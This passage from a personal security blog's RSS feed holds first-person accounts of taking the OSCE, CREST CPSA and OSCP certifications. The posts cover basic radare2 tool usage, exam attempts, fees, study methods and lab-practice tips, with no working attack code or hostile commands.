&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;rasm2 &quot;jmp 16&quot;
eb0e
rasm2 -d eb0e
jmp 0x10
rasm2 -D eb0e
0x00000000 2 eb0e jmp 0x10
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;And for De Bruijn patterns, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ragg2&lt;/code&gt;:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;ragg2 -P 10
41414142414143414144
ragg2 -P 10 -r
AAABAACAAD
ragg2 -q 0x43414144
Little endian: -1
Big endian: 6
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;While &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;r2&lt;/code&gt; is a great tool, Ollydbg is the tried &amp;amp; true debugger. Hard as I tried, I couldn’t fully do without this excellent tool. It is very beneficial to learn its &lt;a href=&quot;https://www.aldeid.com/wiki/OllyDbg&quot;&gt;basic commands&lt;/a&gt; to fully appreciate its capabilities. It’s best to know basic step commands, breakpoint setting, memory &amp;amp; command searching.&lt;/p&gt;

&lt;h3 id=&quot;the-exam-attempt&quot;&gt;The Exam Attempt&lt;/h3&gt;
&lt;p&gt;Before the lab weeks ended, I scheduled my exam. If I had known the next available slot was a month away, I would have scheduled as soon as I received the course materials! I watched the schedule page almost every day for earlier slots. In the end none opened up, and I was stuck with a crappy one which began past midnight on a work day. Having no more lab time, I resolved to practice on my own and study exploits from exploit-db.&lt;/p&gt;

&lt;p&gt;Exam day arrived. First day: things were going great. Two items solved, two remained. Though a simple mistake crushed my chances. Basically, I was smart enough not to realize that &lt;a href=&quot;https://blogs.msdn.microsoft.com/jiangyue/2010/03/15/windows-heap-overrun-monitoring/&quot;&gt;opening an application through the debugger&lt;/a&gt; is not the same as &lt;a href=&quot;http://www.nobugs.org/developer/win32/debug_crt_heap.html&quot;&gt;opening an application and attaching the debugger to it&lt;/a&gt;. That proved to be a critical (and costly) mistake. The exam ended with arms raised in frustrated defeat. It didn’t really feel that bad because I can always try again. That is until the next day when the mistake was discovered &lt;strong&gt;with&lt;/strong&gt; the vulnerability that was missed!&lt;/p&gt;

&lt;p&gt;On the third day &lt;del&gt;(half)&lt;/del&gt; a report was submitted to offsec. &lt;strong&gt;Big Oof.&lt;/strong&gt;&lt;/p&gt;

&lt;h3 id=&quot;the-exam-attempt-part-deux&quot;&gt;The Exam Attempt (Part Deux)&lt;/h3&gt;
&lt;p&gt;The schedule was still tightly booked; the next slot was another month away. &lt;em&gt;“No matter”&lt;/em&gt;, I thought. &lt;em&gt;“I’ll make it this time.”&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Realizing my errors and shortcomings, I resolved to work on them. I polished my code and ported them from my home lab to the course lab (to get a re-attempt, a lab extension must be purchased). I felt refreshed and ready to try again.&lt;/p&gt;

&lt;p&gt;Exam day arrived again. This time I had a better schedule and a clearer path. &lt;strong&gt;And yeah&lt;/strong&gt;, I made sure to start the app and attach the debugger this time &lt;em&gt;(as anyone with sense has been doing all this time)&lt;/em&gt;. I was able to finish up on the first day, wrote the report and sent it off for grading by Saturday midnight.&lt;/p&gt;

&lt;h3 id=&quot;try-waiting-harder&quot;&gt;Try (Waiting) Harder&lt;/h3&gt;
&lt;p&gt;The next week was spent in anxious waiting. The lack of updates from offsec had me in a nervous state. &lt;em&gt;“Did I miss anything? Are my solutions wrong? Were hundreds of screenshots not enough?”&lt;/em&gt; By the middle of the week, I broke the silence and reached out through email and live chat. They politely told me to &lt;del&gt;fuck off&lt;/del&gt; wait as the report was still being graded. I didn’t want to risk waiting for a failed result and spend the rest of the year retaking the exam over and over and over and…&lt;/p&gt;

&lt;p&gt;By Saturday night, the results came in. While it felt great to pass, it did not feel as jubilant as it should have been. Offsec has excellent service, but I believe their processes can be improved, especially when their certs are gaining worth and recognition. Nevertheless, I thanked their support staff for putting up with my whining and for conferring the certification.&lt;/p&gt;

&lt;h3 id=&quot;wrapping-up&quot;&gt;Wrapping up&lt;/h3&gt;
&lt;p&gt;OSCE is a really great course and it deepened my knowledge and understanding of exploit development. It shows its age which, in itself, is an old criticism. But there is little to update to this course anyway, at least for exploit development. Sure the practice vulnerabilities can be updated but that is as far as it goes. The Web &amp;amp; Network related topics seem to be there to pad the course out. Surely, these topics are areas in need of improvement.&lt;/p&gt;

&lt;p&gt;While short, it felt a lot shorter. In OSCP, there were three networks to break but for OSCE there isn’t even one. To practice, you must build a lab. The price bump seems hard to justify, but there aren’t many courses that can compare on top of its industry recognition among other things.&lt;/p&gt;

&lt;p&gt;I am still grateful for taking this course, and I am excited to take on OSEE. It’s damn expensive but as they say, &lt;em&gt;“See how”&lt;/em&gt;.&lt;/p&gt;

&lt;h3 id=&quot;study-materials&quot;&gt;Study Materials&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Note: I didn’t really have a study plan so I just followed other people’s guides, which were more than enough.&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://tulpa-security.com/2017/07/18/288/&quot;&gt;OSCE/CTP Prep Guide (Tulpa Security)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.linkedin.com/pulse/osce-course-exam-review-christopher-hudel&quot;&gt;OSCE Course &amp;amp; Exam Review (Christopher Hudel)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.abatchy.com/2017/03/osce-study-plan&quot;&gt;OSCE Study Plan (abatchy)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.corelan.be/index.php/articles/&quot;&gt;Corelan (Yeah, all of it)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://www.securitysift.com/windows-exploit-development-part-1-basics/&quot;&gt;Windows Exploit Development (SecuritySift)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.fuzzysecurity.com/tutorials/expDev/6.html&quot;&gt;Writing W32 shellcode (FuzzySecurity)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://aboureada.com/cheat_sheet/2017/12/20/radare2_cheat_sheet.html&quot;&gt;Radare2 Cheat Sheet (Anas Aboureada)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.exploit-db.com/&quot;&gt;Exploit-DB&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.aldeid.com/wiki/OllyDbg&quot;&gt;Ollydbg (Aldeid)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.youtube.com/watch?v=BrDujogxYSk&quot;&gt;Basics of fuzzing (Gynvael)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://wildfire.blazeinfosec.com/fuzzing-proprietary-protocols-with-scapy-radamsa-and-a-handful-of-pcaps/&quot;&gt;Fuzzing proprietary protocols with Scapy, radamsa and a handful of PCAPs (Wildfire Labs)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://nostarch.com/hacking2.htm&quot;&gt;Hacking: The Art of Exploitation 2nd Ed. (Jon Erickson)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.wiley.com/en-sg/The+Shellcoder%27s+Handbook%3A+Discovering+and+Exploiting+Security+Holes%2C+2nd+Edition-p-9780470080238&quot;&gt;The Shellcoder’s Handbook: Discovering and Exploiting Security Holes, 2nd Edition (Anley, Heasman, Lindner, Richarte)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</description>
        
          <description>&lt;p&gt;&lt;em&gt;So it’s time for that yearly blog update. I hope to maintain this consistency throughout the lifetime of this blog.&lt;/em&gt;&lt;/p&gt;

</description>
        
        <pubDate>Sun, 02 Jun 2019 00:00:00 +0000</pubDate>
        <link>https://basicinfosecurity.github.io//blog/OSCE-and-Me/</link>
        <guid isPermaLink="true">https://basicinfosecurity.github.io//blog/OSCE-and-Me/</guid>
        
        
      </item>
      
    
      
      <item>
        <title>CREST CPSA Exam</title>
        <description>&lt;p&gt;&lt;em&gt;This post aims to give a rough guide on how to attain CPSA status for OSCP takers.&lt;/em&gt;&lt;/p&gt;

&lt;h3 id=&quot;what-is-cpsa&quot;&gt;What is CPSA?&lt;/h3&gt;
&lt;p&gt;CREST is a &lt;em&gt;not-for-profit&lt;/em&gt; (contra &lt;a href=&quot;https://strategiccfo.com/non-profit-vs-profit/&quot;&gt;&lt;em&gt;non-profit&lt;/em&gt;&lt;/a&gt;) organization that provides accreditation and certification related to information security. If you’re a pentester, chances are you’ve come by a role/job that desires certifications from CREST. Most notable are CRT and CPSA.&lt;/p&gt;

&lt;p&gt;CREST Registered Penetration Tester or &lt;a href=&quot;https://www.crest-approved.org/examination/registered-tester/index.html&quot;&gt;CRT&lt;/a&gt; is basically the equivalent of OSCP as it assesses the hands-on, technical skills of an individual. CREST Practitioner Security Analyst or &lt;a href=&quot;https://www.crest-approved.org/examination/practitioner-security-analyst/index.html&quot;&gt;CPSA&lt;/a&gt; is the counterpart that tests for knowledgeability. Having both CRT and CPSA grants you &lt;strong&gt;Full CREST Equivalency&lt;/strong&gt;. You can check out their &lt;a href=&quot;https://www.crest-approved.org/index.html&quot;&gt;website&lt;/a&gt; for more info.&lt;/p&gt;

&lt;h3 id=&quot;why-get-full-crest-equivalency&quot;&gt;Why get Full CREST Equivalency?&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://i.kym-cdn.com/photos/images/newsfeed/001/090/408/b48.jpg&quot; alt=&quot;Meme 1&quot; /&gt;&lt;/p&gt;

&lt;p&gt;This is a good cert to go after as it is widely known and it’s actually cheaper for OSCP holders: normally it would cost around £645 (CRT is £395 and CPSA is £250, without VAT). You can also check out why to get certified from this &lt;a href=&quot;https://www.crest-approved.org/professional-qualifications/why-a-crest-assessment/index.html&quot;&gt;page&lt;/a&gt;.&lt;/p&gt;

&lt;h3 id=&quot;how-do-you-get-full-equivalency&quot;&gt;How do you get Full Equivalency?&lt;/h3&gt;
&lt;p&gt;If you took OSCP first before possessing any CREST-related certs, you have the opportunity to get CRT and CPSA certified or Full equivalency.&lt;/p&gt;

&lt;h4 id=&quot;process&quot;&gt;Process&lt;/h4&gt;
&lt;ol&gt;
  &lt;li&gt;Send an email to CREST at &lt;a href=&quot;mailto:exambookings@crest-approved.org&quot;&gt;exambookings@crest-approved.org&lt;/a&gt; requesting Full CREST equivalency. Include the following:
    &lt;ul&gt;
      &lt;li&gt;Updated CV&lt;/li&gt;
      &lt;li&gt;Proof of your OSCP attainment: Include your OSID and a scan of your certificate.&lt;/li&gt;
      &lt;li&gt;A signed copy of the CREST Code of Conduct. (You may need to get an updated copy from them first.)&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
  &lt;li&gt;Send your billing details. These will be used to send the CRT cert* and the billing for the CPSA exam. (It took &lt;strong&gt;about two weeks&lt;/strong&gt; for my certificate to be delivered):
    &lt;ul&gt;
      &lt;li&gt;Contact name&lt;/li&gt;
      &lt;li&gt;Email address (kind of redundant but you know)&lt;/li&gt;
      &lt;li&gt;Postal address&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
  &lt;li&gt;Pay the Administration fee (£350)**. After payment you will receive instructions to update your profile and submit your application in their portal.&lt;/li&gt;
  &lt;li&gt;Schedule the exam. You will receive an email containing the voucher code and instructions for setting up your exam schedule.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;*&lt;em&gt;The CRT cert you receive will only be valid for &lt;strong&gt;six months&lt;/strong&gt;, after which it will be revoked. By passing the CPSA exam, you will be granted Full CREST equivalency, extending the validity to 3 years after attainment of OSCP.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;**&lt;em&gt;If you fail your attempt, you have to &lt;strong&gt;pay again&lt;/strong&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In order to minimize procrastination, I scheduled the exam as early as a month ahead. In this way, I had some time to comfortably prepare while keeping a reasonable deadline.&lt;/p&gt;
&lt;h3 id=&quot;preparation&quot;&gt;Preparation&lt;/h3&gt;
&lt;p&gt;The topics covered in the exam can be found in the &lt;a href=&quot;https://www.crest-approved.org/wp-content/uploads/crest-crt-cpsa-technical-syllabus-2.1.pdf&quot;&gt;CPSA syllabus&lt;/a&gt;. As of this writing there are &lt;strong&gt;ten knowledge groups&lt;/strong&gt; which can be condensed roughly into:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Soft skills&lt;/li&gt;
  &lt;li&gt;Pentesting methodology&lt;/li&gt;
  &lt;li&gt;Networking Security&lt;/li&gt;
  &lt;li&gt;Web Security&lt;/li&gt;
  &lt;li&gt;OS &amp;amp; Database Security&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The syllabus contains everything you need to pass the exam. I say “pass” as getting down the basics of all the knowledge groups will probably net you the minimum needed to pass the exam.&lt;/p&gt;

&lt;p&gt;Some important things to note:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;The exam has &lt;strong&gt;120 Multiple Choice items&lt;/strong&gt; to be answered within &lt;strong&gt;2 hours&lt;/strong&gt;. The passing mark is &lt;strong&gt;60%&lt;/strong&gt; (72 items).&lt;/li&gt;
  &lt;li&gt;It is &lt;strong&gt;closed book&lt;/strong&gt;: no notes or references can be used while taking the exam.&lt;/li&gt;
  &lt;li&gt;Additionally, there’s the &lt;del&gt;dreaded&lt;/del&gt; NDA to be signed before taking the exam. Breaching it will revoke your CREST certification.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img height=&quot;500px&quot; width=&quot;700px&quot; src=&quot;https://basicinfosecurity.github.io//assets/img/Scriptorium-monk-at-work.jpg&quot; alt=&quot;Studying&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Prep work can be straightforward, but the difficulty lies in investing time and effort. As the syllabus is the only yardstick you have, it’s hard to know the depth for each topic in each knowledge group. It’s easy to think that overpreparation is a good approach. But it is far better to focus on getting the gist rather than going deep, especially in areas you are lacking. Aim for a good spread: the more basics you have nailed down, the better your chances of passing. I encountered some “Gotcha!” questions in the exam, questions I thought required a certain amount of experience to answer, and some which were somewhat esoteric. But in hindsight, a good foundation was key in helping me to pass.&lt;/p&gt;

&lt;p&gt;With regards to study materials, there’s no better way than to google for them. You should only include materials you have some “confidence” in. If a material is too difficult, it probably won’t stick. If it’s too shallow, there might be better alternatives. Keep them concise and organized to make them more digestible. If some topics are your weak areas, always remember to include only the basics. For general references, you can rely on &lt;a href=&quot;https://www.owasp.org/index.php/Main_Page&quot;&gt;OWASP&lt;/a&gt; and Wikipedia.&lt;/p&gt;

&lt;p&gt;CREST also recommends some books and courses for prep work. If you can spare the money, go for the courses. Having options and alternative studying methods is always great. Having said that, I can’t make any personal recommendation of the courses as I am always trying to keep my expenses down. For books, I own &lt;a href=&quot;https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504&quot;&gt;Red Team Field Manual&lt;/a&gt; &amp;amp; &lt;a href=&quot;https://www.amazon.com/Cryptography-Engineering-Principles-Practical-Applications/dp/0470474246&quot;&gt;Cryptography Engineering&lt;/a&gt;. Having &lt;del&gt;partially&lt;/del&gt; read both of them, these are books I can recommend. I also read &lt;a href=&quot;https://www.amazon.com/Attacking-Network-Protocols-Analysis-Exploitation/dp/1593277504&quot;&gt;Attacking Network Protocols by James Forshaw&lt;/a&gt; which covers a lot of the topics related to network and web protocols, cryptography, and related vulnerabilities.&lt;/p&gt;

&lt;p&gt;Studying for the exam took about a month, but I wasn’t studying every day. I incorporated “&lt;a href=&quot;https://en.wikipedia.org/wiki/Spaced_repetition&quot;&gt;&lt;em&gt;Spaced Repetition&lt;/em&gt;&lt;/a&gt;” due to the amount of material to be absorbed. My approach was to intensely study as much of the reviewer as I could for the first week, and then study again a week before my exam &lt;del&gt;and cram on the day before&lt;/del&gt;. For those two weeks in between, I would do other stuff. I found this to be a great approach as it takes advantage of how the brain operates when it has some unfinished task, when it’s forgetting and trying to remember stuff, etc. It may seem stressful but overall the experience was actually pleasant.&lt;/p&gt;

&lt;h3 id=&quot;exam-day&quot;&gt;Exam Day&lt;/h3&gt;

&lt;p&gt;The exam took an hour to finish. The remaining time was used to review and tally the items I was confident to be correct. This helped me assess the likelihood of passing. The final tally ended up being really close to the score I got in the end. After the exam, the results were given right away.&lt;/p&gt;

&lt;h3 id=&quot;final-thoughts&quot;&gt;Final Thoughts&lt;/h3&gt;
&lt;p&gt;Taking CPSA was a perplexing experience. Preparing for the exam felt like guesswork even if a syllabus was provided. It feels as if, were I to take it again, I would be facing a different beast. It didn’t really feel like it was a test of knowledge and experience. Rather, it felt like a test of how much trivia I can fit in my head. Perhaps I have some misplaced expectations from the exam. Despite these misgivings, I can still recommend this cert for any aspiring candidates. It’s a good cert that can open doors for professionals who have taken OSCP, especially for those who recently passed and are looking for their next challenge and a boost to their profile. Give it a try if you’re interested.&lt;/p&gt;

&lt;p&gt;If you have further questions feel free to &lt;a href=&quot;/contact&quot;&gt;contact&lt;/a&gt; me. Good luck!&lt;/p&gt;

</description>
        
          <description>&lt;p&gt;&lt;em&gt;This post aims to give a rough guide on how to attain CPSA status for OSCP takers.&lt;/em&gt;&lt;/p&gt;

</description>
        
        <pubDate>Sun, 23 Sep 2018 00:00:00 +0000</pubDate>
        <link>https://basicinfosecurity.github.io//blog/CREST-CPSA/</link>
        <guid isPermaLink="true">https://basicinfosecurity.github.io//blog/CREST-CPSA/</guid>
        
        
      </item>
      
    
      
      <item>
        <title>OSCP and Me</title>
        <description>&lt;p&gt;&lt;em&gt;This post took some time to write as I had my laptop’s keyboard fixed. In my eagerness to reach for water, I spilled it over my keyboard. If this happened during my exam, my bowels would have dropped with biblical magnitude.&lt;/em&gt;&lt;/p&gt;

&lt;h3 id=&quot;a-bit-of-history&quot;&gt;A Bit of History&lt;/h3&gt;

&lt;p&gt;Last year, I set my goals for 2017. My top priority was to achieve OSCP. This cert was awesome because:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;It was relatively cheaper than other industry-recognized certs.&lt;/li&gt;
  &lt;li&gt;It was highly regarded by most security professionals due to the difficulty of the accompanying course, among other reasons.&lt;/li&gt;
  &lt;li&gt;It greatly enhances students’ knowledge on “Offensive Security” (more of the subject and less (incidentally) about the vendor)&lt;/li&gt;
  &lt;li&gt;It had no “maintenance fees”.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;At that time I knew I was far from prepared:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;I neither knew how to avail of the course nor personally knew any OSCP holder who could guide me.&lt;/li&gt;
  &lt;li&gt;There were huge gaps between my knowledge and the subjects included in the &lt;a href=&quot;https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf&quot;&gt;PWK Course Syllabus&lt;/a&gt;, particularly Buffer Overflows, Client Side Attacks, and Port Redirection and Tunneling.&lt;/li&gt;
  &lt;li&gt;My pentesting skills, though palpable, were not mature enough. They were mostly effective in isolated environments (e.g. vulnhubs).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A good way to know if you’re prepared is to ask “If you were in the middle of a situation &lt;em&gt;X&lt;/em&gt;, would you overcome it?”. If someone asked me to take the course at that moment, I would have struggled twice as hard as if I had prepared appropriately.&lt;/p&gt;

&lt;h3 id=&quot;whats-the-plan&quot;&gt;What’s the plan?&lt;/h3&gt;

&lt;p&gt;To prepare, it was necessary to take stock of my overall capabilities and resources:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;I had ample knowledge of web vulnerabilities from Vulnhub VMs and CTFs.&lt;/li&gt;
  &lt;li&gt;I knew how to read and to program in various programming languages, particularly Python.&lt;/li&gt;
  &lt;li&gt;I was experienced in using Linux, particularly Kali.&lt;/li&gt;
  &lt;li&gt;I had a good laptop that was capable of running VMs.&lt;/li&gt;
  &lt;li&gt;I had a fundamental understanding of network protocols (e.g. TCP, UDP).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;My biggest hurdle was the subject of Buffer Overflows, as my knowledge of it was mediocre. I knew nothing of Client Side attacks and could barely simulate port forwarding. Everything else in the PWK Syllabus I had already practiced. It was only a matter of filling in these gaps in order to be competent enough for the course. But I also had practical worries:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Money - There was less than a year to save up for the budget.&lt;/li&gt;
  &lt;li&gt;Time -  There was less than a year to study.&lt;/li&gt;
  &lt;li&gt;Internet - My internet plan needed to support the VPN for the labs. Internet in the Philippines can be described with various four letter words. Decide which you prefer.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If I wanted to take the course, I needed enough time and money to capture my budget and to allot time for the course and any exam attempts. For my plan to work, I needed to save enough for the 60 day labs + Exam attempt package and upgrading my internet plan.&lt;/p&gt;

&lt;p&gt;My plan was simple but risky.&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;Save enough money to avail the course and any retake attempts.&lt;/li&gt;
  &lt;li&gt;Gather enough studying material based on the PWK course syllabus.&lt;/li&gt;
  &lt;li&gt;Study the materials to gain enough knowledge to accomplish the labs as soon as the course starts.&lt;/li&gt;
  &lt;li&gt;Take the exam.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;It’s slipshod and not recommended. Due to my financial situation, I had to adapt to a strict budget and time frame which seemed to convolute things. Indeed they did. But time and money were not on my side. I had been saving up for a long time ever since I made OSCP one of my goals for 2017. The rate at which I saved only allowed 60 days’ worth of lab time with a cushion fund for about two retakes. If I wanted 90 days’ worth of labs, my goal would have been pushed to 2018 as it meant I would need to begin my labs at a later date. That was unacceptable; I had to be practical if I were to do it.&lt;/p&gt;

&lt;h3 id=&quot;the-plan-in-action&quot;&gt;The &lt;em&gt;“Plan”&lt;/em&gt; in action&lt;/h3&gt;

&lt;p&gt;The budget needed to be built right away. For the following months, I set aside an additional portion of my pay, besides my savings, and any extra income for the budget. At the same time, I studied. To make the most out of lab time, I needed to be equipped with the basic skills necessary to progress as soon as it started. But my pace was leisurely. It does not take too much time to acquire the basic skills, as most of the time was used in practising and honing them. I did Vulnhub VMs whenever I could and read whenever I was away from my laptop. I also began collecting blog posts and articles of OSCP holders to get an idea of what to expect from the course. &lt;a href=&quot;http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html&quot;&gt;Jollyfrogs’ account&lt;/a&gt; of the course mentions that there were around 60 machines (in truth there were around 50) in the labs. This was both fortunate and unfortunate: though there was enough lab time, it required taking down one machine per day.&lt;/p&gt;

&lt;p&gt;For almost a year I stuck to my plan and eventually it bore some fruit. As early as June I had enough money to avail the course. It was finally time to &lt;a href=&quot;https://www.offensive-security.com/preregistration.php?cid=21&quot;&gt;register&lt;/a&gt;. As I was not sponsored by my company, I had to do things a bit differently. For starters, when submitting your details at the Registration Sign-up Form, it requires you to submit scans of your government-issued ID. I sent over a pdf of my driver’s license scans to &lt;a href=&quot;mailto:registrar@offensive-security.com&quot;&gt;registrar@offensive-security.com&lt;/a&gt;. After acknowledging receipt, they sent an email containing confirmation of successful reservation for the course, my OSID/Student ID, and instructions for testing lab VPN connectivity and for paying the fees. I scheduled my labs to begin a full month after I registered as I figured it would not hurt to have final preparations before starting.&lt;/p&gt;

&lt;p&gt;And so it began. There was no going back. To quote Canto III of the Inferno, “Abandon all hope, ye who enter here.”&lt;/p&gt;

&lt;h3 id=&quot;descending-the-rings-of-hell&quot;&gt;Descending the Rings of Hell&lt;/h3&gt;

&lt;p&gt;Labs started. I received my course materials and had downloaded the &lt;a href=&quot;https://support.offensive-security.com/#!pwk-kali-vm.md&quot;&gt;PWK VM&lt;/a&gt; in advance. Prior to that, I joined a slack community, &lt;a href=&quot;https://netsecfocus.herokuapp.com/&quot;&gt;NetSecFocus&lt;/a&gt;, where fellow students studied together. There was a channel where only students may join and where some Offsec student admins make appearances (all hail the great llama Abatchy!). Students and OSCP holders offered some great advice, articles and tools that helped in taking the course. If need be, I had the help of the student community at close reach as well as a wealth of knowledge from the course materials. At that moment I felt ready to take on the course.&lt;/p&gt;

&lt;p&gt;&lt;img height=&quot;300px&quot; width=&quot;500px&quot; src=&quot;https://basicinfosecurity.github.io//assets/img/baby groot.jpg&quot; alt=&quot;baby groot&quot; /&gt;&lt;/p&gt;

&lt;p&gt;On the same evening I took down my first machine, Alice. It was a really easy machine but a good first step. I began to fulfill my quota of 1 machine/lab day, working 3 to 4 hours each weeknight and as much time as I could on the weekends throughout the course. Of course there were times I was not able to stick to my quota: on some days I would be away on vacation, on some days I would be stuck on some boxes. Nevertheless I finished all the lab machines across three subnets. It was only in the labs that I was able to learn pivoting and client side attacks. As I progressed, I formed my own methodology based on what worked best. I discovered that:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;&lt;strong&gt;Information gathering is very important.&lt;/strong&gt; Take down as many notes as you can. Capture screenshots whenever you’ve confirmed a vulnerability, any vulnerability, especially once you’ve escalated privileges. The purpose of a good information gathering phase is twofold. First, the more time spent on this phase, the less time you need to compromise the target. If ever there’s a time a wall has been reached, it is most likely there is not enough information to go by. Second, it will prevent you from backtracking by providing you enough material to build your Lab Report. Submitting a Lab Report helps a student pass by adding 5 bonus points to your exam score.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;Pay attention to details.&lt;/strong&gt; Sometimes, &lt;em&gt;the devil is in the details.&lt;/em&gt; Learn to put two and two together and you’ll be able to see the bigger picture.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;A good Post-Exploitation phase helps in lateral movement.&lt;/strong&gt; Once you’ve successfully taken down a machine, explore it. Because the lab machines form a corporate network, they have relationships to other lab machines that become apparent upon further inspection. This was an entirely new concept to me as I was so used to isolated Vulnhub VMs that required no prerequisites and that required only direct attacks.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;Build a Kit.&lt;/strong&gt; It’s annoying to have to go back and forth transferring multiple tools and exploits from your machine to your target. Make the process easier by building a kit. A good kit is composed of tools that will aid you in transferring other tools, creating backdoors, uncovering credentials and escalating privileges. My kit is usually composed of a privilege escalation suggester script, netcat, two well-known kernel exploits, and credential dumping tools all packed inside a Zip archive. A Python SimpleHTTPServer is running to serve the kit and any of the individual files should Zip decompressing prove to be impossible.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;Don’t go after the Big Four immediately.&lt;/strong&gt; This one is contentious, I think. Very often, students race to finish them for whatever reason. I think these machines serve a better purpose by helping students prepare for the exam. What I did with them is to simulate a “mock exam” by doing all of them simultaneously in addition to another lab box within the span of 24 hours. Though in my case, I failed by my own standards. Having stumbled on sufferance in my first 2 weeks, there were only three of the Big Four left for the mock exam. Not only that, after finishing all of these boxes I was so tired that by the end I was unable to do two more. The experience did teach me that the exam was no joke as it was both mentally and physically burdening. It also taught me that dwelling on a box before moving on severely hinders progress. It was better to switch boxes from time to time.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;By the time I finished the entire lab network I had less than a week left of lab time. This time was used to rush my Lab Report ahaha. It was probably the most tedious part as I began going through the lab materials right before the end. There were so many of these exercises to answer and to document that I had to sacrifice sleep time just to finish the report. Damn 5 bonus points.&lt;/p&gt;

&lt;h3 id=&quot;the-9th-circle&quot;&gt;The 9th Circle&lt;/h3&gt;
&lt;p&gt;&lt;img height=&quot;300px&quot; width=&quot;500px&quot; src=&quot;https://basicinfosecurity.github.io//assets/img/Gustave_Dore_Inferno34.jpg&quot; alt=&quot;cocytus&quot; /&gt;&lt;/p&gt;

&lt;p&gt;After finishing the lab report, I had about two weeks ahead before taking the exam. This was the soonest schedule I got. Coming out of the labs left me drained. The ordeal was toilsome though the end was also near. Or so I thought.&lt;/p&gt;

&lt;p&gt;My activity in the weeks ahead of the exam alternated between resting and practising. I figured that it was necessary to keep my health up while retaining everything the course taught me. I reviewed my notes and wrote “Lessons Learned” sections for each as refreshers. Kits were prepared. The lab report was cleaned up and an exam report template was also prepared.&lt;/p&gt;

&lt;p&gt;Exam day came. I was scheduled in the afternoon but only had 3 hours’ worth of sleep. Tossing and turning didn’t help get more. With each hour of unrest I grew more anxious, so that by the time I started I was wide awake with stress. It was only the beginning of worse things ahead. After 5 hours I got my first machine. 9 hours before the exam ended I got my second. Five hours later, I got a low privileged shell on another. The rest of my time was consumed in desperately throwing every exploit I could find. My first exam attempt ended in miserable failure. During the exam, I could feel the stress washing over me in waves. Each frustrated attempt was punctuated by heavy exhalation. As each hour passed my head felt hotter, my heart beat faster, my hands shook more heavily and my eyes grew more bloodshot. In essence, I strayed from the methodology I’d learned, let stress get to me and surrendered my fate to luck.&lt;/p&gt;

&lt;p&gt;I fought the battle to the bitter end. But the war went on.&lt;/p&gt;

&lt;h3 id=&quot;purgatorio&quot;&gt;Purgatorio&lt;/h3&gt;

&lt;p&gt;&lt;img height=&quot;700px&quot; width=&quot;500px&quot; src=&quot;https://basicinfosecurity.github.io//assets/img/purgatorio.jpg&quot; alt=&quot;purgatorio&quot; /&gt;&lt;/p&gt;

&lt;p&gt;I knew I didn’t have enough points to pass. Even worse, there was one screenshot missing. So, there were even fewer points to not pass. Great.&lt;/p&gt;

